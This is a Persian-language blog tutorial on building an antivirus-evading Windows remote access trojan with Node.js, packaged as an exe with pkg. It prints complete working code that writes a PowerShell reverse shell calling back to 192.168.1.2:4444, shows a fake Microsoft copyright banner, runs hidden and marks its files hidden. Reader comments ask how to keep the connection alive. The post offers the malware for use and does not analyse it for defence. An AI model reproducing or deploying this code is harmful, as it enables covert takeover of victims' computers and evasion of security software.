هیچ محصولی در سبد خرید نیست.
آموزش ساخت رت FUD ويندوز با استفاده از Node.js
با سلام خدمت تمامی کاربران عزیز سایت Vip Security
دوباره با یک پست خیلی عالی و جذاب در خدمت شما دوستان عزیز هستیم
خب شاید براتون سوال باشه که مگه با نود جی اس ( node.js ) مگه میشه رت یا رات ویندوز ساخت؟😲 باید در پاسخ بگ که بله ! 😎
خب اول از موازد پایه روع کنیم و بعد بریم سراغ آموزش ویدیویی 🙂
رت چیست؟
مخفف کلمه (RAT) رت (Remote Access Trojan) هست و به زبان ساده (Remote Administration Tool)یعنی دسترسی از راه دور , بخوام واضع تر توضیح بدم رت به ما این امکان رو میده که بتونیم سیستم یا گوشی ها رو کنترل
کنیم , وقتی میشنوید یک گوشی هک شده و تمامی اطلاعات اون شخص پخش شده دلیلش فکر میکنید چی هست ؟ درست
فهمیدید هکر ها از رت ها برای کنترل سیستم قربانی هاشون استفاده میکنند , رت ابزاری بسیار خطرناکی هست و خیلی از هک هایی که اتفاق میفته امروزه از طریق همین رت هست. تا اینجا فهمیدیم که رت چیه 😉
Node.js چیست؟
js یک پلتفرم کدنویسی سمت سرور است که بر پایه موتور جاوا اسکریپت مرورگر گوگل کروم کدنویسی شده است. این پلتفرم توسط رایان داهل در سال ۲۰۰۹ ایجاد شده است و در حال حاضر آخرین نسخه آن ورژن ۰٫۱۰٫۳۶ میباشد.
بر اساس اعلان مستندات رسمی تعریف Node.Js به شکل زیر عنوان میشود:
Node.js یک پلتفرم ایجاد شده بر پایه موتور جاوا اسکریپت گوگل کروم است که باعث سهولت ایجاد و مقیاسپذیری برنامههای تحت شبکه میشود. این پلتفرم از یک مدل I/O رویداد محور استفاده میکند که مسدود نشونده (non-blocking) است و همین امر باعث کاهش فشار موجود بر روی سرور و افزایش کارآیی میشود و این امر برای اجرای برنامههای مبتنی بر داده که بصورت بلادرنگ (Real-Time) بر روی سرورهای نامتمرکز استفاده میشوند بسیار مناسب است.”
Node.js یک پلتفرم کد باز برای گسترش برنامههای سمت سرور و تحت شبکه میباشد. این پلتفرم بر اساس زبان جاوا اسکریپت نوشته شده است و میزبانی و هاست Nodejs قابلیت پیادهسازی بر روی سیستمعاملهای ویندوز، لینوکس و سیستم عامل کامپیوترهای اپل را دارد.
این فریم ورک کتابخانهای عظیم از ماژولهای مختلف جاوا اسکریپت را فراهم میکند که سهولت در گسترش وباپلیکیشن ها را تا حد زیادی فراهم میآورد.
چطور میشه از پروژه Node.js خروجی اپلیکیشن ویندوز یا لینوکس گرفت؟
خب شاید براتون عجیب باشه ولی تعجب نکنید ! این روزا از زبان جاوا اسکریپت تقریبا در همه جا استفاده میشه از وب گرفته تا اپلیکیشن اندروید ، ios & macOs و یا لینوکس و میشه گفت آینده واقعا عالی داره
خب برای انجام چنین چیزی شما باید با استفاده از دستور زیر ماژول pkg رو به پروژه تون ادد کنید
npm install -g pkg
با استفاده از دستور زیر میتونید خروجی مخصوص به پلتفرم مدنظرتون رو بگیرید در اینجا اسم پروژه ما index.js هست و خروجی exe میخواهیم
pkg index.js -o MyApp.exe
اگر در حین احرای دستور مشکلی داشتید حتما دستورات زیر را وارد کنید و دوباره خروجی بگیرید
npm install --global windows-build-tools
npm cache clean --force
پیلود چیست ؟
payload در لغت به بار و محموله ای سود آور می گویند و این نام را از این جهت برای ان انتخاب کرده اند به دلیل ان که payload شامل کد های مخرب است.
پیلود FUD چیست؟
FUD یعنی Fully UnDetectable (FUD) by Anti-Virus (AV) software به زبان فارسی یعنی پیلود مخربی که توسط آنتی ویروس ها غیرقابل شناسایی است
آموزش ساخت رت ویندوز FUD با استفاده از Node.js :
برای مشاهده ویدیو حتما vpn خود را روشن کنید و حتما کانال یوتوب ما رو هم دنبال کنید !
کد پروژه استفاده شده در ویدیو :
var spawn = require("child_process");
var fs = require('fs');
fs.writeFile('my.ps1',`$c = New-Object System.Net.Sockets.TCPClient("192.168.1.2",4444);
$I = $c.GetStream();
[byte[]]$U = 0..(2-shl15)|%{0};
$U = ([text.encoding]::ASCII).GetBytes("Copyright (C) 2021 Microsoft Corporation. All rights reserved.'n'n")
$I.Write($U,0,$U.Length)
$U = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$I.Write($U,0,$U.Length)
while(($k = $I.Read($U, 0, $U.Length)) -ne 0){;$D = (New-Object System.Text.UTF8Encoding).GetString($U,0, $k);
$a = (iex $D 2>&1 | Out-String );
$r = $a + (pwd).Path + '> ';
$m = ([text.encoding]::ASCII).GetBytes($r);
$I.Write($m,0,$m.Length);
$I.Flush()};
$c.Close()`,function (err) {
if (err) throw err;
spawn.exec('powershell.exe -windowstyle hidden -file my.ps1 ');
spawn.exec('attrib +h "my.ps1" | attrib +h "2.exe"');
});
مطالب زیر را حتما مطالعه کنید
تحلیل و اکسپلویت آسیب پذیری Spring4Shell
یک آسیبپذیری جدید روز صفر اجرای کد از راه دور...
حمله MITM چیست؟ ( آموزش حملات MITM )
حمله MITM چیست ؟حمله مرد میانی یا همان man in...
آموزش تست نفوذ پروتکل SS7
در این سری پست ها به بررسی پروتکل SS7 می...
آموزش نفوذ به Android , IOS , Windows , Linux با استفاده از ابزار Venom
با سلام خدمت تمامی کاربران عزیز سایت Vip Securityدر این...
تحلیل و اكسپلویت آسیب پذیری log4shell و روش های رفع این آسیب پذیری
همین چند روز پیش، در ۹ دسامبر ، محققان کد...
آموزش اکسپلویت آسیب پذیری javaScript Prototype Pollution و نحوه یافتن آن
با سلام خدمت تمامی کاربران عزیز سایت Vip Securityدر این...
عالی
بعد اولین اجرا
پاور شل end process کردم بعدش هرچی فایل باز میکنم دیگه وصل نمیشه
و تو پس زمینه هم پاور شل در حالت اجرا نیست
مشکل چیه؟
سلام دوست عزیز
همانطور که در ویدیو گفتیم ما دسترسی شل معکوس را از طریق اسکریپت پاورشل میگیریم و در ویدیو هم گفتیم که وقتی خود فایل رت اجرایی را end process کنید دسترسی از بین نمیره ولی اما پاورشل را end process کنید دسترسی از بین میره